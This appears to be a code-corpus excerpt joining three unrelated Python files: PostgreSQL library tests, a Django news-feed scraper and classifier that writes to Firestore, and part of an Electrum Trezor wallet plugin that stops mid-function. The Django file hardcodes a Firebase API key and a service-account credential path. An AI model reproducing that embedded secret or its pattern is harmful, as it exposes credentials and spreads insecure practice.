assert n == 3
def test_readonly_cursor(self):
try:
with self.db.get_cursor(readonly=True) as cursor:
cursor.execute("INSERT INTO foo VALUES ('blam')")
except ReadOnlySqlTransaction:
pass
def test_get_cursor_supports_subtransactions(self):
before_count = self.db.one("SELECT count(*) FROM foo")
with self.db.get_cursor(back_as='dict') as outer_cursor:
outer_cursor.execute("INSERT INTO foo VALUES ('lorem')")
with self.db.get_cursor(cursor=outer_cursor) as inner_cursor:
assert inner_cursor is outer_cursor
assert inner_cursor.back_as == 'dict'
inner_cursor.execute("INSERT INTO foo VALUES ('ipsum')")
after_count = self.db.one("SELECT count(*) FROM foo")
assert after_count == (before_count + 2)
def test_subtransactions_do_not_swallow_exceptions(self):
before_count = self.db.one("SELECT count(*) FROM foo")
try:
with self.db.get_cursor() as cursor:
cursor.execute("INSERT INTO foo VALUES ('lorem')")
with self.db.get_cursor(cursor=cursor) as c:
c.execute("INSERT INTO foo VALUES ('ipsum')")
raise Heck
except Heck:
pass
after_count = self.db.one("SELECT count(*) FROM foo")
assert after_count == before_count
# db.get_connection
# =================
class TestConnection(WithData):
def test_get_connection_gets_a_connection(self):
with self.db.get_connection() as conn:
cursor = conn.cursor(cursor_factory=SimpleDictCursor)
cursor.execute("SELECT * FROM foo ORDER BY bar")
actual = cursor.fetchall()
assert actual == [{"bar": "baz"}, {"bar": "buz"}]
def test_connection_rollback_exception_is_ignored(self):
try:
with self.db.get_connection() as conn:
conn.close()
raise Heck
except Heck:
pass
def test_connection_has_get_cursor_method(self):
with self.db.get_connection() as conn:
with conn.get_cursor() as cursor:
cursor.execute("DELETE FROM foo WHERE bar = 'baz'")
with self.db.get_cursor(cursor_factory=SimpleDictCursor) as cursor:
cursor.execute("SELECT * FROM foo ORDER BY bar")
actual = cursor.fetchall()
assert actual == [{"bar": "buz"}]
def test_get_cursor_method_checks_cursor_argument(self):
with self.db.get_connection() as conn, self.db.get_cursor() as cursor:
with self.assertRaises(ValueError):
conn.get_cursor(cursor=cursor)
# orm
# ===
class TestORM(WithData):
class MyModel(Model):
__slots__ = ('bar', '__dict__')
typname = "foo"
def __init__(self, values):
Model.__init__(self, values)
self.bar_from_init = self.bar
def update_bar(self, bar):
self.db.run("UPDATE foo SET bar=%s WHERE bar=%s", (bar, self.bar))
self.set_attributes(bar=bar)
def setUp(self):
WithData.setUp(self)
self.db.register_model(self.MyModel)
def tearDown(self):
self.db.model_registry = {}
def installFlah(self):
self.db.run("CREATE TABLE flah (bar text)")
self.db.register_model(self.MyModel, 'flah')
def test_register_model_handles_schema(self):
self.db.run("DROP SCHEMA IF EXISTS foo CASCADE")
self.db.run("CREATE SCHEMA foo")
self.db.run("CREATE TABLE foo.flah (bar text)")
self.db.register_model(self.MyModel, 'foo.flah')
def test_register_model_raises_AlreadyRegistered(self):
with self.assertRaises(AlreadyRegistered) as context:
self.db.register_model(self.MyModel)
assert context.exception.args == (self.MyModel, self.MyModel.typname)
assert str(context.exception) == (
"The model MyModel is already registered for the typname foo."
)
def test_register_model_raises_NoSuchType(self):
with self.assertRaises(NoSuchType):
self.db.register_model(self.MyModel, 'nonexistent')
def test_register_model_raises_NoTypeSpecified(self):
with self.assertRaises(NoTypeSpecified):
self.db.register_model(Model)
def test_orm_basically_works(self):
one = self.db.one("SELECT foo FROM foo WHERE bar='baz'")
assert one.__class__ == self.MyModel
def test_orm_models_get_kwargs_to_init(self):
one = self.db.one("SELECT foo FROM foo WHERE bar='baz'")
assert one.bar_from_init == 'baz'
def test_updating_attributes_works(self):
one = self.db.one("SELECT foo FROM foo WHERE bar='baz'")
one.update_bar("blah")
bar = self.db.one("SELECT bar FROM foo WHERE bar='blah'")
assert bar == one.bar
def test_setting_unknown_attributes(self):
one = self.db.one("SELECT foo FROM foo WHERE bar='baz'")
with self.assertRaises(UnknownAttributes) as context:
one.set_attributes(bar='blah', x=0, y=1)
assert sorted(context.exception.args[0]) == ['x', 'y']
assert str(context.exception) == (
"The following attribute(s) are unknown to us: %s."
) % ', '.join(context.exception.args[0])
def test_attributes_are_read_only(self):
one = self.db.one("SELECT foo FROM foo WHERE bar='baz'")
with self.assertRaises(ReadOnlyAttribute) as context:
one.bar = "blah"
assert context.exception.args == ("bar",)
assert str(context.exception).startswith("bar is a read-only attribute.")
def test_check_register_raises_if_passed_a_model_instance(self):
obj = self.MyModel(['baz'])
raises(NotAModel, self.db.check_registration, obj)
def test_check_register_doesnt_include_subsubclasses(self):
class Other(self.MyModel): pass # noqa: E701
raises(NotRegistered, self.db.check_registration, Other)
def test_dot_dot_dot_unless_you_ask_it_to(self):
class Other(self.MyModel): pass # noqa: E701
assert self.db.check_registration(Other, True) == ['foo']
def test_check_register_handles_complex_cases(self):
self.installFlah()
class Second(Model): pass # noqa: E701
self.db.run("CREATE TABLE blum (bar text)")
self.db.register_model(Second, 'blum')
assert self.db.check_registration(Second) == ['blum']
class Third(self.MyModel, Second): pass # noqa: E701
actual = list(sorted(self.db.check_registration(Third, True)))
assert actual == ['blum', 'flah', 'foo']
def test_a_model_can_be_used_for_a_second_type(self):
self.installFlah()
self.db.run("INSERT INTO flah VALUES ('double')")
self.db.run("INSERT INTO flah VALUES ('trouble')")
flah = self.db.one("SELECT flah FROM flah WHERE bar='double'")
assert flah.bar == "double"
def test_check_register_returns_string_for_single(self):
assert self.db.check_registration(self.MyModel) == ['foo']
def test_check_register_returns_list_for_multiple(self):
self.installFlah()
actual = list(sorted(self.db.check_registration(self.MyModel)))
assert actual == ['flah', 'foo']
def test_unregister_unregisters_one(self):
self.db.unregister_model(self.MyModel)
assert self.db.model_registry == {}
def test_unregister_leaves_other(self):
self.db.run("CREATE TABLE flum (bar text)")
class OtherModel(Model): pass # noqa: E701
self.db.register_model(OtherModel, 'flum')
self.db.unregister_model(self.MyModel)
assert self.db.model_registry == {'flum': OtherModel}
def test_unregister_unregisters_multiple(self):
self.installFlah()
self.db.unregister_model(self.MyModel)
assert self.db.model_registry == {}
def test_add_column_doesnt_break_anything(self):
self.db.run("ALTER TABLE foo ADD COLUMN boo text")
one = self.db.one("SELECT foo FROM foo WHERE bar='baz'")
assert one.boo is None
def test_replace_column_different_type(self):
self.db.run("CREATE TABLE grok (bar int)")
self.db.run("INSERT INTO grok VALUES (0)")
class EmptyModel(Model): pass # noqa: E701
self.db.register_model(EmptyModel, 'grok')
# Add a new column then drop the original one
self.db.run("ALTER TABLE grok ADD COLUMN biz text NOT NULL DEFAULT 'x'")
self.db.run("ALTER TABLE grok DROP COLUMN bar")
# The number of columns hasn't changed but the names and types have
one = self.db.one("SELECT grok FROM grok LIMIT 1")
assert one.biz == 'x'
assert not hasattr(one, 'bar')
@mark.xfail(raises=AttributeError)
def test_replace_column_same_type_different_name(self):
self.db.run("ALTER TABLE foo ADD COLUMN biz text NOT NULL DEFAULT 0")
self.db.run("ALTER TABLE foo DROP COLUMN bar")
one = self.db.one("SELECT foo FROM foo LIMIT 1")
assert one.biz == 0
assert not hasattr(one, 'bar')
# SimpleCursorBase
# ================
class TestSimpleCursorBase(WithData):
def test_fetchone(self):
with self.db.get_cursor(cursor_factory=SimpleTupleCursor) as cursor:
cursor.execute("SELECT 1 as foo")
r = cursor.fetchone()
assert r == (1,)
def test_fetchone_supports_back_as(self):
with self.db.get_cursor() as cursor:
cursor.execute("SELECT 1 as foo")
r = cursor.fetchone(back_as=dict)
assert r == {'foo': 1}
cursor.execute("SELECT 2 as foo")
r = cursor.fetchone(back_as=tuple)
assert r == (2,)
def test_fetchone_raises_BadBackAs(self):
with self.db.get_cursor() as cursor:
cursor.execute("SELECT 1 as foo")
with self.assertRaises(BadBackAs) as context:
cursor.fetchone(back_as='bar')
assert str(context.exception) == (
"%r is not a valid value for the back_as argument.\n"
"The available values are: Row, dict, namedtuple, tuple."
) % 'bar'
def test_fetchmany(self):
with self.db.get_cursor(cursor_factory=SimpleTupleCursor) as cursor:
cursor.execute("SELECT 1 as foo")
r = cursor.fetchmany()
assert r == [(1,)]
def test_fetchmany_supports_back_as(self):
with self.db.get_cursor() as cursor:
cursor.execute("SELECT 1 as foo")
r = cursor.fetchmany(back_as=dict)
assert r == [{'foo': 1}]
cursor.execute("SELECT 2 as foo")
r = cursor.fetchmany(back_as=tuple)
assert r == [(2,)]
def test_fetchmany_raises_BadBackAs(self):
with self.db.get_cursor() as cursor:
cursor.execute("SELECT 1 as foo")
with self.assertRaises(BadBackAs) as context:
cursor.fetchmany(back_as='bar')
assert str(context.exception) == (
"%r is not a valid value for the back_as argument.\n"
"The available values are: Row, dict, namedtuple, tuple."
) % 'bar'
def test_fetchall(self):
with self.db.get_cursor(cursor_factory=SimpleTupleCursor) as cursor:
cursor.execute("SELECT 1 as foo")
r = cursor.fetchall()
assert r == [(1,)]
def test_fetchall_supports_back_as(self):
with self.db.get_cursor() as cursor:
cursor.execute("SELECT 1 as foo")
r = cursor.fetchall(back_as=dict)
assert r == [{'foo': 1}]
cursor.execute("SELECT 2 as foo")
r = cursor.fetchall(back_as=tuple)
assert r == [(2,)]
def test_fetchall_raises_BadBackAs(self):
with self.db.get_cursor() as cursor:
cursor.execute("SELECT 1 as foo")
with self.assertRaises(BadBackAs) as context:
cursor.fetchall(back_as='bar')
assert str(context.exception) == (
"%r is not a valid value for the back_as argument.\n"
"The available values are: Row, dict, namedtuple, tuple."
) % 'bar'
# cursor_factory
# ==============
class WithCursorFactory(WithSchema):
def setUp(self): # override
self.db = Postgres(cursor_factory=self.cursor_factory)
self.db.run("DROP SCHEMA IF EXISTS public CASCADE")
self.db.run("CREATE SCHEMA public")
self.db.run("CREATE TABLE foo (key text, value int)")
self.db.run("INSERT INTO foo VALUES ('buz', 42)")
self.db.run("INSERT INTO foo VALUES ('biz', 43)")
class TestNamedTupleCursorFactory(WithCursorFactory):
cursor_factory = SimpleNamedTupleCursor
def test_NamedDictCursor_results_in_namedtuples(self):
Record = namedtuple("Record", ["key", "value"])
expected = [Record(key="biz", value=43), Record(key="buz", value=42)]
actual = self.db.all("SELECT * FROM foo ORDER BY key")
assert actual == expected
assert actual[0].__class__.__name__ == 'Record'
def test_namedtuples_can_be_unrolled(self):
actual = self.db.all("SELECT value FROM foo ORDER BY key")
assert actual == [43, 42]
class TestRowCursorFactory(WithCursorFactory):
cursor_factory = SimpleRowCursor
def test_RowCursor_returns_Row_objects(self):
row = self.db.one("SELECT * FROM foo ORDER BY key LIMIT 1")
assert isinstance(row, Row)
rows = self.db.all("SELECT * FROM foo ORDER BY key")
assert all(isinstance(r, Row) for r in rows)
def test_Row_objects_can_be_unrolled(self):
actual = self.db.all("SELECT value FROM foo ORDER BY key")
assert actual == [43, 42]
def test_one(self):
r = self.db.one("SELECT * FROM foo ORDER BY key LIMIT 1")
assert isinstance(r, Row)
assert r[0] == 'biz'
assert r.key == 'biz'
assert r['key'] == 'biz'
assert r[1] == 43
assert r.value == 43
assert r['value'] == 43
assert repr(r) == "Row(key='biz', value=43)"
def test_all(self):
rows = self.db.all("SELECT * FROM foo ORDER BY key")
assert isinstance(rows[0], Row)
assert rows[0].key == 'biz'
assert rows[0].value == 43
assert rows[1].key == 'buz'
assert rows[1].value == 42
def test_iter(self):
with self.db.get_cursor() as cursor:
cursor.execute("SELECT * FROM foo ORDER BY key")
i = iter(cursor)
assert cursor.rownumber == 0
t = next(i)
assert isinstance(t, Row)
assert t.key == 'biz'
assert t.value == 43
assert cursor.rownumber == 1
assert cursor.rowcount == 2
t = next(i)
assert isinstance(t, Row)
assert t.key == 'buz'
assert t.value == 42
assert cursor.rownumber == 2
assert cursor.rowcount == 2
with self.assertRaises(StopIteration):
next(i)
assert cursor.rownumber == 2
assert cursor.rowcount == 2
def test_row_unpack(self):
foo, bar = self.db.one("SELECT 1 as foo, 2 as bar")
assert foo == 1
assert bar == 2
def test_row_comparison(self):
r = self.db.one("SELECT 1 as foo, 2 as bar")
assert r == r
assert r == (1, 2)
assert r == {'foo': 1, 'bar': 2}
assert r != None # noqa: E711
def test_special_col_names(self):
r = self.db.one('SELECT 1 as "foo.bar_baz", 2 as "?column?", 3 as "3"')
assert r['foo.bar_baz'] == 1
assert r['?column?'] == 2
assert r['3'] == 3
def test_nonascii_names(self):
r = self.db.one('SELECT 1 as \xe5h\xe9, 2 as \u2323')
assert getattr(r, '\xe5h\xe9') == 1
assert getattr(r, '\u2323') == 2
|
__init__.py
|
# Create your views here.
import feedparser
import nltk
from nltk.tag import StanfordPOSTagger
from nltk import word_tokenize
import os
import csv
import threading, time
from geograpy.extraction import Extractor
import firebase_admin
from firebase_admin import credentials, firestore
cred = credentials.Certificate("../DjangoBackendOne/news/newsapp-54f7c-firebase-adminsdk-wzja4-dc085fad0b.json")
firebase_admin.initialize_app(cred)
db = firestore.client()
jar = '../DjangoBackendOne/stanford-postagger-2018-10-16/stanford-postagger.jar'
model = '../DjangoBackendOne/stanford-postagger-2018-10-16/models/english-left3words-distsim.tagger'
java_path = "C:/Program Files/Java/jdk1.8.0_101/bin/java.exe"
os.environ['JAVAHOME'] = java_path
nltk.internals.config_java('C:/Program Files/Java/jdk1.8.0_101/bin/java.exe')
pos_tagger = StanfordPOSTagger(model, jar)
pos_tagger.java_options = '-mx4096m'
config = {
"apiKey": "AIzaSyBJumddViT3Y70F6vmEdP_1VMGXqEFaqgg",
"authDomain": "newsapp-54f7c.firebaseapp.com",
"databaseURL": "https://newsapp-54f7c.firebaseio.com",
"projectId": "newsapp-54f7c",
"storageBucket": "newsapp-54f7c.appspot.com",
"messagingSenderId": "841850292385"
}
# firebase = pyrebase.initialize_app(config)
newsObjects = []
entityCount = 1
nouns = []
adj = []
sportKeyWords = []
polKeyWords = []
busKeyWords = []
eduKeyWords = []
healthKeyWords = []
entKeyWords = []
class News:
# category = ''
# title = ''
# description = ''
# locations = []
# link = ''
# summery = ''
# date_time= ''
def __init__(self, title, description, summary, link, category, date_time, id):
self.category = category
self.title = title
self.description = description
self.summary = summary
self.link = link
self.date_time = date_time
self.news_id=id
def print_test(self):
print(self.title)
def add_locations(self, locations):
self.locations = locations
with open('../DjangoBackendOne/news/NewsCategoryData.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
print(f'Column names are {", ".join(row)}')
line_count += 1
else:
# print(f'\t{row[0]} works in the {row[1]} department, and was born in {row[2]}.')
# checks the data in dataset are strings or null values
# check the row 0 : business keywords
if row[0].isdigit() or row[0] == '':
row[0]
else:
busKeyWords.append(row[0])
# check the row 1 : sport keywords
if row[1].isdigit() or row[1] == '':
row[1]
else:
sportKeyWords.append(row[1])
# check the row 2 : politics keywords
if row[2].isdigit() or row[2] == '':
row[2]
else:
polKeyWords.append(row[2])
# check the row 3 : education keywords
if row[3].isdigit() or row[3] == '':
row[3]
else:
eduKeyWords.append(row[3])
# check the row 4 : helth keywords
if row[4].isdigit() or row[4] == '':
row[4]
else:
healthKeyWords.append(row[4])
# check the row 5 : entertainment keywords
if row[5].isdigit() or row[5] == '':
row[5]
else:
entKeyWords.append(row[5])
# busKeyWords.append(row[0])
# polKeyWords.append(row[2])
line_count += 1
print(f'Processed {line_count} lines.')
csv_file.close()
class Counter:
counterName = None
counterValue = None
def check_with_sport_data():
global nouns
sportCount = 0
for n in nouns:
for s in sportKeyWords:
if n == s:
sportCount += 1
countObj = Counter()
countObj.counterName = 'sports'
countObj.counterValue = sportCount
return countObj
def check_with_pol_data():
global nouns
polCount = 0
for n in nouns:
for s in polKeyWords:
if n == s:
polCount += 1
countObj = Counter()
countObj.counterName = 'political'
countObj.counterValue = polCount
return countObj
def check_with_bus_data():
global nouns
busCount = 0
for n in nouns:
for s in busKeyWords:
if n == s:
busCount += 1
countObj = Counter()
countObj.counterName = 'business'
countObj.counterValue = busCount
return countObj
def check_with_edu_data():
global nouns
eduCount = 0
for n in nouns:
for s in eduKeyWords:
if n == s:
eduCount += 1
countObj = Counter()
countObj.counterName = 'education'
countObj.counterValue = eduCount
return countObj
def check_with_ent_data():
global nouns
entCount = 0
for n in nouns:
for s in entKeyWords:
if n == s:
entCount += 1
countObj = Counter()
countObj.counterName = 'entertainment'
countObj.counterValue = entCount
return countObj
def check_with_health_data():
global nouns
helCount = 0
for n in nouns:
for s in healthKeyWords:
if n == s:
helCount += 1
countObj = Counter()
countObj.counterName = 'health'
countObj.counterValue = helCount
return countObj
counterObjArray = []
categoryName = ''
def classify_news(news):
text = pos_tagger.tag(word_tokenize(news))
print(text)
global nouns
global adj
for i in text:
if i[1][0] == "N":
nouns += [i[0]]
elif i[1][0] == "J":
adj += [i[0]]
# for i in nouns:
# print(i)
global counterObjArray
global categoryName
counterObjArray.append(check_with_sport_data())
counterObjArray.append(check_with_pol_data())
counterObjArray.append(check_with_bus_data())
counterObjArray.append(check_with_edu_data())
counterObjArray.append(check_with_ent_data())
counterObjArray.append(check_with_health_data())
maxValue = counterObjArray[0].counterValue
categoryName = counterObjArray[0].counterName
for i in counterObjArray:
if i.counterValue > maxValue:
print('test counter details ', i.counterName, ' value ', i.counterValue)
maxValue = i.counterValue
categoryName = i.counterName
print('nouns test1 ', nouns)
nouns.clear()
print('nouns test ', nouns)
return categoryName
news_in_db=[]
def retrive_news_from_firebase():
print('running retrive_news_from_firebase')
global db,news_in_db
docs = db.collection(u'news').get()
try:
for doc in docs:
obj= News(doc._data['title'],doc._data['description'],doc._data['summary'],doc._data['link'],doc._data['category'],doc._data['date_time'],doc._data['news_id'])
obj.add_locations(doc._data['locations'])
news_in_db.append(obj)
print(' retrive_news_from_firebase complete')
except:
print('retrive_news_from_firebase() Error')
def is_news_already_exist_in_db(title):
print('running is_news_already_exist_in_db')
try:
global news_in_db
for news in news_in_db:
if news.title== title:
print('True')
return True
except:
print('Error in is_news_already_exist_in_db()')
#retrive the maximum news id and set it to entityCount
def set_entityCount():
global news_in_db
max_entityCount=news_in_db[0].news_id
for news in news_in_db:
if max_entityCount< news.news_id:
max_entityCount=news.news_id
global entityCount
entityCount=max_entityCount+1
print('current index',entityCount)
def check_news_dataset():
global news_in_db
newsId=[]
with open('../DjangoBackendOne/news/NewsDataset.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
newsId.append(row[0])
csv_file.close()
with open('../DjangoBackendOne/news/NewsDataset.csv', 'a') as csvFile:
writer = csv.writer(csvFile)
for news in news_in_db:
for id in newsId:
if id != news.news_id:
row = [news.news_id, news.title, news.category, news.summary, news.description,
news.link,news.date_time]
writer.writerow(row)
csvFile.close()
def update_news_dataset(object):
row = [object.news_id,object.title,object.category,object.summary,object.description,object.link,object.date_time]
with open('../DjangoBackendOne/news/NewsDataset.csv', 'a') as csvFile:
writer = csv.writer(csvFile)
writer.writerow(row)
csvFile.close()
def collect_news():
print('Running collecting news')
retrive_news_from_firebase()
# check_news_dataset()
set_entityCount()
url = ["http://www.adaderana.lk/rss.php",
"http://www.hirunews.lk/rss/english.xml",
"https://www.news.lk/news?format=feed",
"https://srilankamirror.com/news?format=feed&type=rss",
"http://www.thesundayleader.lk/feed/",
"https://www.newsfirst.lk/feed/"
]
for url in url:
# print(url)
# read the rss feeds from urls
feedParsed = feedparser.parse(url)
# print(feedParsed)
# check whether the rss reading success or not
if feedParsed.feed != {}:
global news_in_db
global entityCount
for post in feedParsed.entries:
if is_news_already_exist_in_db(post.title)!= True:
category = classify_news(post.title)
newsObj = News(post.title, post.description, post.summary, post.link, category, post.published,entityCount)
newsObjects.append(newsObj)
locations = Extractor(text=post.description) # Extract location
locations.find_entities()
# print(locations.places) # locations is an array
newsObj.add_locations(locations.places)
# data = {
# "title": newsObj.title,
# "id":entityCount,
# "description": newsObj.description,
# "summary": newsObj.summery,
# "link": newsObj.link,
# "category": newsObj.category,
# "locations": newsObj.locations,
# "date_time": newsObj.date_time
# }
# firebase.database().set(data)
global db
doc_ref = db.collection(u'news').document()
doc_ref.set({
u'title':newsObj.title,
u'news_id':newsObj.news_id,
u'description': newsObj.description,
u'summary': newsObj.summary,
u'link': newsObj.link,
u'category': newsObj.category,
u'locations': newsObj.locations,
u'date_time': newsObj.date_time
})
update_news_dataset(newsObj)
# db.collection(u'newsAppData').document(u'news').set(newsObj)
print("feed " + str(newsObj.news_id) + " : " + str(newsObj.title))
print('category: ', category, '. time ', newsObj.date_time, ' . locations:', newsObj.locations)
entityCount = entityCount + 1
else:
print('Connection failed with url :', url)
WAIT_SECONDS = 100 # timer for thread
print(time.ctime())
news_in_db.clear()
threading.Timer(WAIT_SECONDS, collect_news).start()
# thred1 = threading.Thread(target= collect_news)
# thred1.start()
if os.environ.get('RUN_MAIN', None) != 'true':
default_app_config = 'mydjangoapp.apps.MydjangoappConfig'
collect_news()
# collect_news()
#
# WAIT_SECONDS=1
# def run_thread():
# print(time.ctime())
# threading.Timer(WAIT_SECONDS, run_thread).start()
#
# run_thread()
# docs = db.collection(u'news').get()
#
# for doc in docs:
# print('###################################################')
|
plugin.py
|
import base64
import re
import threading
from binascii import hexlify, unhexlify
from functools import partial
from electrum.bitcoin import (bc_address_to_hash_160, xpub_from_pubkey,
public_key_to_p2pkh, EncodeBase58Check,
TYPE_ADDRESS, TYPE_SCRIPT,
TESTNET, ADDRTYPE_P2PKH, ADDRTYPE_P2SH)
from electrum.i18n import _
from electrum.plugins import BasePlugin, hook
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class TrezorCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Electrum and %s encryption and decryption are currently incompatible') % self.device)
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
payload = base64.b64decode(message)
nonce, message, msg_hmac = payload[:33], payload[33:-8], payload[-8:]
result = client.decrypt_message(address_n, nonce, message, msg_hmac)
return result.message
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never returns if keepkey is plugged
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated %s firmware for device labelled %s. Please '
'download the updated firmware from %s') %
(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
# All client interaction should not be in the main GUI thread
assert self.main_thread != threading.current_thread()
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your %s.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your %s, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
) % (self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER and self.device == 'TREZOR':
# Warn user about firmware lameness
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard):
'''Called when creating a new wallet. Select the device to use. If
the device is uninitialized, go through the intialization
process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m')
client.used()
def get_xpub(self, device_id, derivation, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = signed_tx.encode('hex')
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
client.get_address(self.get_coin_name(), address_n, True)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, x_pubkey.decode('hex'))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: x.decode('hex') if x else '', txin.get('signatures')),
m=txin.get('num_sig'),
)
txinputtype = self.types.TxInputType(
script_type=self.types.SPENDMULTISIG,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = txin['scriptSig'].decode('hex')
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
